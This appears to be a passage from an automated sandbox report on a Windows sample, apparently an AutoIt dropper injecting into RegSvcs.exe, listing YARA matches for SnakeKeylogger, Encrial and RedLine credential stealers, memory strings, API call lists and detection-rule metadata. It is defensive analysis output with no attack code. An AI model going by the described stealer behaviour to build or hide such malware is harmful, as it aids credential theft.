              Source: 3.2.RegSvcs.exe.4295570.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 3.2.RegSvcs.exe.4295570.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 3.2.RegSvcs.exe.2eb1ad6.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 3.2.RegSvcs.exe.2eb1ad6.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 3.2.RegSvcs.exe.4296458.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 3.2.RegSvcs.exe.4296458.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 3.2.RegSvcs.exe.2eb0bee.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 3.2.RegSvcs.exe.2eb0bee.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.2.njVvgA8pEB.exe.1400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 3.2.RegSvcs.exe.4296458.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 3.2.RegSvcs.exe.4296458.7.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 00000003.00000002.4188901545.00000000056D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000003.00000002.4188901545.00000000056D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 00000003.00000002.4186590756.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000003.00000002.4188676018.0000000004291000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000000.00000002.1722801122.0000000000FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 00000003.00000002.4183734715.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 00000003.00000002.4186778603.00000000031D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000003.00000002.4186778603.00000000031D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 00000002.00000002.1740251386.0000000001400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: Process Memory Space: RegSvcs.exe PID: 7300, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Binary is likely a compiled AutoIt script file
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: This is a third-party compiled AutoIt script.0_2_00313B3A
              Source: njVvgA8pEB.exeString found in binary or memory: This is a third-party compiled AutoIt script.
              Source: njVvgA8pEB.exe, 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_43552604-5
              Source: njVvgA8pEB.exe, 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_63a54ae2-9
              Source: njVvgA8pEB.exe, 00000002.00000002.1739671212.00000000003C4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_b0d3ae2b-f
              Source: njVvgA8pEB.exe, 00000002.00000002.1739671212.00000000003C4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_406bdd0a-3
              Source: njVvgA8pEB.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_26ea1106-d
              Source: njVvgA8pEB.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_e86b0d94-8
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_0037A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_0037A1EF
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_00368310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00368310
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_003751BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_003751BD
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_0031E6A00_2_0031E6A0
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_0033D9750_2_0033D975
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_003321C50_2_003321C5
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_003462D20_2_003462D2
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_003903DA0_2_003903DA
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_0034242E0_2_0034242E
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_003325FA0_2_003325FA
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_0036E6160_2_0036E616
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_003266E10_2_003266E1
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_0034878F0_2_0034878F
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_003288080_2_00328808
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_003908570_2_00390857
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_003468440_2_00346844
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_003788890_2_00378889
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_00350B3B0_2_00350B3B
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_0033CB210_2_0033CB21
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_00346DB60_2_00346DB6
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_00326F9E0_2_00326F9E
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_003230300_2_00323030
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_003331870_2_00333187
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_0033F1D90_2_0033F1D9
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_003112870_2_00311287
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_003314840_2_00331484
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_003255200_2_00325520
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_003376960_2_00337696
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_003257600_2_00325760
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_003319780_2_00331978
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_00349AB50_2_00349AB5
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_0031FCE00_2_0031FCE0
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_0033BDA60_2_0033BDA6
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_00331D900_2_00331D90
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_00397DDB0_2_00397DDB
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_0031DF000_2_0031DF00
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_00323FE00_2_00323FE0
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_012FA7A00_2_012FA7A0
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 2_2_016BF3382_2_016BF338
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00408C603_2_00408C60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0040DC113_2_0040DC11
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00407C3F3_2_00407C3F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00418CCC3_2_00418CCC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00406CA03_2_00406CA0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004028B03_2_004028B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0041A4BE3_2_0041A4BE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00408C603_2_00408C60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004182443_2_00418244
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004016503_2_00401650
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00402F203_2_00402F20
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004193C43_2_004193C4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004187883_2_00418788
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00402F893_2_00402F89
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00402B903_2_00402B90
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004073A03_2_004073A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011D11A83_2_011D11A8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011D14393_2_011D1439
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_011D14483_2_011D1448
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_032449503_2_03244950
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_03242F103_2_03242F10
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_03244F723_2_03244F72
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0324EED03_2_0324EED0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_03242F013_2_03242F01
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0040E1D8 appears 43 times
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: String function: 00338900 appears 42 times
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: String function: 00317DE1 appears 35 times
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: String function: 00330AE3 appears 70 times
              Source: njVvgA8pEB.exe, 00000000.00000003.1720346942.0000000003C0D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs njVvgA8pEB.exe
              Source: njVvgA8pEB.exe, 00000000.00000003.1719705740.0000000003A63000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs njVvgA8pEB.exe
              Source: njVvgA8pEB.exe, 00000000.00000002.1722801122.0000000000FF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCloudServices.exe< vs njVvgA8pEB.exe
              Source: njVvgA8pEB.exe, 00000002.00000003.1730428811.0000000003E53000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs njVvgA8pEB.exe
              Source: njVvgA8pEB.exe, 00000002.00000003.1736838584.0000000003FFD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs njVvgA8pEB.exe
              Source: njVvgA8pEB.exe, 00000002.00000002.1740251386.0000000001400000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCloudServices.exe< vs njVvgA8pEB.exe
              Source: njVvgA8pEB.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 0.2.njVvgA8pEB.exe.ff0000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 3.2.RegSvcs.exe.4295570.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.RegSvcs.exe.4295570.6.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.RegSvcs.exe.56d0000.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.RegSvcs.exe.56d0000.8.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.RegSvcs.exe.42be590.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.RegSvcs.exe.42be590.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.RegSvcs.exe.56d0000.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.RegSvcs.exe.56d0000.8.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.RegSvcs.exe.2eb1ad6.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.RegSvcs.exe.2eb1ad6.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.RegSvcs.exe.31d0ee8.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.RegSvcs.exe.31d0ee8.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.RegSvcs.exe.31d0000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.RegSvcs.exe.31d0000.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.RegSvcs.exe.42be590.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.RegSvcs.exe.42be590.5.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.RegSvcs.exe.31d0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.RegSvcs.exe.31d0000.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.RegSvcs.exe.31d0ee8.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.RegSvcs.exe.31d0ee8.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.RegSvcs.exe.2eb0bee.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.RegSvcs.exe.2eb0bee.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.RegSvcs.exe.4295570.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.RegSvcs.exe.4295570.6.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.RegSvcs.exe.2eb1ad6.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.RegSvcs.exe.2eb1ad6.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
